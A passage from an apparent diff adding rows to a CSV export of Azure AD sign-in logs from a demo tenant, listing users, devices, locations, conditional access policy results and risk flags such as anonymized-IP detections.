joined'}",ec85dd07-c5e8-494c-aa5b-3f84a5cf0600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,ec85dd07-c5e8-494c-aa5b-3f84a5cf0600,SigninLogs,Sucess,50.6406517,5.572050095
+1512,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:08.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2cb2eeee-4240-49f2-a91d-4657fc08a7e5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d09c2317-414d-4072-ab4f-d2f6f75b0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d09c2317-414d-4072-ab4f-d2f6f75b0800,SigninLogs,Sucess,34.06555176,-118.2405396
+1513,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:56.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0d941348-ac6d-40cb-983c-21b88a514e67,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",9cf72c2b-aa6a-41ec-adc7-3fa2b7b90a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9cf72c2b-aa6a-41ec-adc7-3fa2b7b90a00,SigninLogs,Sucess,36.6404686,-78.26995087
+1514,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:27.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e630df93-1976-48c5-b462-749ace3f226b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3006daeb-4fa9-44e4-baa4-8ca708f70700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,3006daeb-4fa9-44e4-baa4-8ca708f70700,SigninLogs,Sucess,50.6406517,5.572050095
+1515,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5b639a8-c969-42bc-bfc2-0921363d4daf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",34a4214f-a676-41f3-9bb4-26fa470d0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,34a4214f-a676-41f3-9bb4-26fa470d0600,SigninLogs,Sucess,36.6404686,-78.26995087
+1516,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:51.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a052e7e-2284-4115-9ddd-003fb9820700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a052e7e-2284-4115-9ddd-003fb9820700,SigninLogs,Sucess,34.06555176,-118.2405396
+1517,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:47.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c9d29a1e-cb6a-4bbb-ab3e-00dd6762d9ca,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ca1de4aa-1783-40c1-890d-66bcbc060700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,ca1de4aa-1783-40c1-890d-66bcbc060700,SigninLogs,Sucess,50.6406517,5.572050095
+1518,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:29.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,56e43083-3ee6-45ae-9bf0-8aed960ba51b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:53,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",99476ccd-67d1-454b-a7cf-079ea2ac0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99476ccd-67d1-454b-a7cf-079ea2ac0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1519,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:42.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8832a75f-df05-4fda-b1dd-ea735aa95dfa,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Microsoft Teams,1fec8e78-bce4-4aaf-ab1b-5451cc387264,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, 